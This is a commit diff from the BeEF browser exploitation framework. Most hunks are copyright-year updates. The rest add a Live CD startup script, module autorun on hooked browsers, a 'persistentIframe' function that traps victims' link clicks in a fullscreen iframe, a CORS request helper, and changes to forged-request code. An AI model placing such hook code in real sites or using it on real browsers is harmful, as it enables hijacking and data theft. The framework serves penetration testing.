Updated copyright year to 2013

Moved avant_steal_history module to 'browser' category

BeEFLive.sh

@@ -0,0 +1,110 @@
+#!/bin/bash
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'home/beef/doc/COPYING' for copying permission
+#
+
+   
+#
+# This is the auto startup script for the BeEF Live CD. 
+# IT SHOULD ONLY BE RUN ON THE LIVE CD
+# Download LiveCD here: https://github.com/beefproject/beef/downloads
+#
+# This script contains a few fixes to make BeEF play nicely with the way  
+# remastersys creates the live cd distributable as well as generating host keys 
+# to enable SSH etc. The script also make it easy for the user to update/start 
+# the BeEF server
+#
+clear
+echo "======================================"
+echo "          BeEF Live CD   "
+echo "======================================"
+echo ""
+echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
+echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+echo "See the file 'home/beef/doc/COPYING' for copying permission"
+echo ""
+
+echo "Welcome to the BeEF Live CD" 
+echo "" 
+echo ""
+
+#
+# Check for SSH Host Keys - if they do not exist ask user if they should be 
+# created (remastersys has a habit of deleting them during Live CD Creation)
+#
+f1="/etc/ssh/ssh_host_rsa_key"
+if [ -f $f1 ]
+then
+	echo ""
+else 
+	echo -n "Would you like to enable ssh (y/N)? "
+	read var
+	
+	if [ $var = "y" ] ; then
+		 sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+		 sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+		 echo ""
+		 echo "Please provide a password for ssh user: beef"
+		 sudo passwd beef
+		 echo "ssh enabled"
+	fi
+fi
+echo ""
+
+#
+# Prompt the user if they would like to update BeEF and 
+# other components installed (such as sqlmap and msf)
+#
+echo -n "Check and install updates for BeEF (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+	 cd /opt/beef
+	 git stash
+	 git pull
+fi
+echo ""
+
+echo -n "Check and install updates for msf and sqlmap (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+ 	 cd /opt/sqlmap
+ 	 git stash
+	 git pull
+	 cd /opt/metasploit-framework
+	 git stash
+	 git pull
+fi
+ 
+ 
+#
+# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
+# (if they do not yet exist)
+#
+f1="beef"
+if [ -f $f1 ] ; then
+	echo ""
+else
+	ln -s /opt/beef/ beef
+	ln -s /opt/metasploit-framework/ msf
+	ln -s /opt/sqlmap/ sqlmap
+fi
+
+#
+# Prompt the user if they would like start BeEF
+#
+echo -n "Start BeEF (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+	echo ""
+	echo "Starting BeEF..";
+	
+	cd /opt/beef
+	ruby beef -x
+fi
+
+

Gemfile

@@ -1,7 +1,7 @@
 # BeEF's Gemfile
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

INSTALL.txt

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 

README

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 

README.mkd

@@ -1,6 +1,6 @@
 ===============================================================================
    
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 

Rakefile

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

VERSION

@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.8-alpha
+0.4.3.9-alpha

beef

@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

config.yaml

@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.8-alpha'
+    version: '0.4.3.9-alpha'
     debug: false
 
     restrictions:
@@ -20,6 +20,10 @@ beef:
         debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
         host: "0.0.0.0"
         port: "3000"
+        # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
+        # It's not advised to decrease it with tons of hooked browsers (more than 50),
+        # because it might impact performance. Also, enable WebSockets is generally better.
+        xhr_poll_timeout: 5000
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
@@ -34,8 +38,8 @@ beef:
           enable: false
           secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
-          secure_port: 61986 # WSS
-          alive_timer: 1000 # poll BeEF every second
+          secure_port: 61986 # WSSecure
+          ws_poll_timeout: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
@@ -55,6 +59,12 @@ beef:
         # README.databases file
 
         # supported DBs: sqlite, mysql, postgres
+        # NOTE: you must change the Gemfile adding a gem require line like:
+        #   gem "dm-postgres-adapter"
+        # or
+        #   gem "dm-mysql-adapter"
+        # if you want to switch drivers from sqlite to postgres (or mysql).
+        # Finally, run a 'bundle install' command and start BeEF.
         driver: "sqlite"
 
         # db_file is only used for sqlite
@@ -72,6 +82,13 @@ beef:
         user:   "beef"
         passwd: "beef"
 
+    # Autorun modules as soon the browser is hooked.
+    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
+    autorun:
+        enable: true
+        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
+        allow_user_notify: true
+
     crypto_default_value_length: 80
 
     # You may override default extension configuration parameters here

core/api.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/migration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/network_stack/assethandler.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/main/server/hook.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/module.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/api/modules.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/bootstrap.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/core.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/extension.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/extensions.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/base.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/browser.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/http.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/filters/page.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/hbmanager.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/loader.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/client/are.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/beef.js

@@ -1,18 +1,16 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
 /*!
  * BeEF JS Library <%= @beef_version %>
- * http://beef.googlecode.com/
+ * Register the BeEF JS on the window object.
  */
 
 $j = jQuery.noConflict();
 
-//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
-
 if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 	
 	var BeefJS = {

core/main/client/browser/cookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/browser/popup.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/dom.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -108,6 +108,25 @@ beef.dom = {
 		}
 		return iframe;
 	},
+
+    /**
+     * Load the link (href value) in an overlay foreground iFrame.
+     * The BeEF hook continues to run in background.
+     * NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
+     * Framebusting techniques, this will not work.
+     */
+    persistentIframe: function(){
+        $j('a').click(function(e) {
+            if ($j(this).attr('href') != '')
+            {
+                e.preventDefault();
+                beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+                $j(document).attr('title', $j(this).html());
+                document.body.scroll = "no";
+                document.documentElement.style.overflow = 'hidden';
+            }
+        });
+    },
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true

core/main/client/encode/base64.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/encode/json.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/geolocation.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/hardware.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/init.js

@@ -1,14 +1,18 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
-
-// if beef.pageIsLoaded is true, then this JS has been loaded >1 times 
-// and will have a new session id. The new session id will need to know
-// the brwoser details. So sendback the browser details again.
-
+/**
+ * @literal object: beef.init
+ * Contains the beef_init() method which starts the BeEF client-side
+ * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
+ *
+ * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
+ * and will have a new session id. The new session id will need to know
+ * the brwoser details. So sendback the browser details again.
+ */
 BEEFHOOK = beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
@@ -49,6 +53,13 @@ window.onclose = function (event) {
     }
 };
 
+/**
+ * Starts the polling mechanism, and initialize various components:
+ *  - browser details (see browser.js) are sent back to the "/init" handler
+ *  - the polling starts (checks for new commands, and execute them)
+ *  - the logger component is initialized (see logger.js)
+ *  - the Autorun Engine is initialized (see are.js)
+ */
 function beef_init() {
     if (!beef.pageIsLoaded) {
         beef.pageIsLoaded = true;
@@ -58,15 +69,12 @@ function beef_init() {
             beef.updater.execute_commands();
             beef.logger.start();
             beef.are.init();
-
-        }
-        else {
+        }else {
             beef.net.browser_details();
             beef.updater.execute_commands();
             beef.updater.check();
             beef.logger.start();
             beef.are.init();
         }
-
     }
 }

core/main/client/lib/evercookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/logger.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/mitb.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -7,7 +7,14 @@
 /*!
  * @literal object: beef.net
  *
- * Provides basic networking functions.
+ * Provides basic networking functions,
+ * like beef.net.request and beef.net.forgeRequest,
+ * used by BeEF command modules and the Requester extension,
+ * as well as beef.net.send which is used to return commands
+ * to BeEF server-side components.
+ *
+ * Also, it contains the core methods used by the XHR-polling
+ * mechanism (flush, queue)
  */
 beef.net = {
 
@@ -21,7 +28,10 @@ beef.net = {
     sid_count:0,
     cmd_queue:[],
 
-    //Command object
+    /**
+     * Command object. This represents the data to be sent back to BeEF,
+     * using the beef.net.send() method.
+     */
     command:function () {
         this.cid = null;
         this.results = null;
@@ -29,13 +39,17 @@ beef.net = {
         this.callback = null;
     },
 
-    //Packet object
+    /**
+     * Packet object. A single chunk of data. X packets -> 1 stream
+     */
     packet:function () {
         this.id = null;
         this.data = null;
     },
 
-    //Stream object
+    /**
+     * Stream object. Contains X packets, which are command result chunks.
+     */
     stream:function () {
         this.id = null;
         this.packets = [];
@@ -51,7 +65,8 @@ beef.net = {
 
     /**
      * Response Object - used in the beef.net.request callback
-     * Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
+     * NOTE: as we are using async mode, the response object will be empty if returned.
+     * Using sync mode, request obj fields will be populated.
      */
     response:function () {
         this.status_code = null;        // 500, 404, 200, 302
@@ -64,7 +79,13 @@ beef.net = {
         this.headers = null;            // full response headers
     },
 
-    //Queues the command, to be sent back to the framework on the next refresh
+    /**
+     * Queues the specified command results.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
     queue:function (handler, cid, results, callback) {
         if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
             var s = new beef.net.command();
@@ -76,26 +97,40 @@ beef.net = {
         }
     },
 
-    //Queues the current command and flushes the queue straight away
+    /**
+     * Queues the current command results and flushes the queue straight away.
+     * NOTE: Always send Browser Fingerprinting results
+     * (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
+     * even if WebSockets are enabled.
+     * @param: {String} handler: the server-side handler that will be called
+     * @param: {Integer} cid: command id
+     * @param: {String} results: the data to send
+     * @param: {Function} callback: the function to call after execution
+     */
     send:function (handler, cid, results, callback) {
-        if (typeof beef.websocket === "undefined") {
+        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
             this.queue(handler, cid, results, callback);
             this.flush();
-        }
-        else {
+        }else {
             try {
                 beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                     '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                     '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }
-            catch (e) {
+            }catch (e) {
                 this.queue(handler, cid, results, callback);
                 this.flush();
-                }
+            }
         }
     },
 
-    //Flush all currently queued commands to the framework
+    /**
+     * Flush all currently queued command results to the framework,
+     * chopping the data in chunks ('chunk' method) which will be re-assembled
+     * server-side by the network stack.
+     * NOTE: currently 'flush' is used only with the default
+     * XHR-polling mechanism. If WebSockets are used, the data is sent
+     * back to BeEF straight away.
+     */
     flush:function () {
         if (this.cmd_queue.length > 0) {
             var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
@@ -119,13 +154,21 @@ beef.net = {
         }
     },
 
-    //Split string into chunk lengths determined by amount
+    /**
+     * Split the input data into chunk lengths determined by the amount parameter.
+     * @param: {String} str: the input data
+     * @param: {Integer} amount: chunk length
+     */
     chunk:function (str, amount) {
         if (typeof amount == 'undefined') n = 2;
         return str.match(RegExp('.{1,' + amount + '}', 'g'));
     },
 
-    //Push packets to framework
+    /**
+     * Push the input stream back to the BeEF server-side components.
+     * It uses beef.net.request to send back the data.
+     * @param: {Object} stream: the stream object to be sent back.
+     */
     push:function (stream) {
         //need to implement wait feature here eventually
         for (var i = 0; i < stream.pc; i++) {
@@ -134,7 +177,7 @@ beef.net = {
     },
 
     /**
-     *Performs http requests
+     * Performs http requests
      * @param: {String} scheme: HTTP or HTTPS
      * @param: {String} method: GET or POST
      * @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -193,13 +236,12 @@ beef.net = {
             data:data,
             timeout:(timeout * 1000),
 
-            //needed otherwise jQuery always add Content-type: application/xml, even if data is populated
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
             beforeSend:function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
-
             success:function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
@@ -240,9 +282,11 @@ beef.net = {
     },
 
     /*
-     * Similar to this.request, except from a few things that are needed when dealing with forged requests:
+     * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
      *  - requestid: needed on the callback
      *  - allowCrossDomain: set cross-domain requests as allowed or blocked
+     *
+     * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      */
     forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
 
@@ -285,14 +329,21 @@ beef.net = {
             return response;
         }
 
-        // build and execute the request
-        if (method == "POST") {
+        /*
+         * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
+         * This will turn POSTs into GETs for remote-domain requests.
+         */
+        if (method == "POST"){
             $j.ajaxSetup({
-                data:data
+                dataType: dataType
+            });
+        } else {
+            $j.ajaxSetup({
+                dataType: 'script'
             });
         }
 
-		// this is required for bugs in IE so data can be transfered back to the server
+		// this is required for bugs in IE so data can be transferred back to the server
         if ( beef.browser.isIE() ) {
             dataType = 'script'
         }
@@ -303,9 +354,7 @@ beef.net = {
             headers: headers,
             timeout: (timeout * 1000),
 
-            // needed otherwise jQuery always adds:
-            // Content-type: application/xml
-            // even if data is populated
+            //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
             beforeSend:function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
@@ -407,7 +456,9 @@ beef.net = {
         return false;
     },
 
-    //Sends back browser details to framework
+    /**
+     * Sends back browser details to framework, calling beef.browser.getDetails()
+     */
     browser_details:function () {
         var details = beef.browser.getDetails();
         details['HookSessionID'] = beef.session.get_hook_session_id();

core/main/client/net/cors.js

@@ -0,0 +1,77 @@
+beef.net.cors = {
+
+  handler: "cors",
+
+    /**
+     * Response Object - used in the beef.net.request callback
+     */
+    response:function () {
+        this.status  = null;      // 500, 404, 200, 302, etc
+        this.headers = null;      // full response headers
+        this.body    = null;      // full response body
+    },
+
+    /**
+     * Make a cross-domain request using CORS
+     *
+     * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
+     * @param url {String} url
+     * @param data {String} request body
+     * @param callback {Function} function to callback on completion
+     */
+    request: function(method, url, data, callback) {
+
+    var xhr;
+    var response = new this.response;
+
+    if (XMLHttpRequest) {
+        xhr = new XMLHttpRequest();
+
+        if ('withCredentials' in xhr) {
+            xhr.open(method, url, true);
+            xhr.onerror = function() {
+            };
+            xhr.onreadystatechange = function() {
+                if (xhr.readyState === 4) {
+                    response.headers = this.getAllResponseHeaders()
+                    response.body    = this.responseText;
+                    response.status  = this.status;
+                    if (!!callback) {
+                        if (!!response) {
+                            callback(response);
+                        } else { 
+                            callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                        }
+                    }
+                }
+            };
+            xhr.send(data);
+        }
+    } else if (typeof XDomainRequest != "undefined") {
+        xhr = new XDomainRequest();
+        xhr.open(method, url);
+        xhr.onerror = function() {
+        };
+        xhr.onload = function() {
+            response.headers = this.getAllResponseHeaders()
+            response.body    = this.responseText;
+            response.status  = this.status;
+            if (!!callback) {
+                if (!!response) {
+                    callback(response);
+                } else {
+                    callback('ERROR: No Response. CORS requests may be denied for this resource.')
+                }
+            }
+        };
+        xhr.send(data);
+    } else {
+        if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
+    }
+
+    }
+
+};
+
+beef.regCmp('beef.net.cors');
+

core/main/client/net/dns.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/local.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/portscanner.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/requester.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/os.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
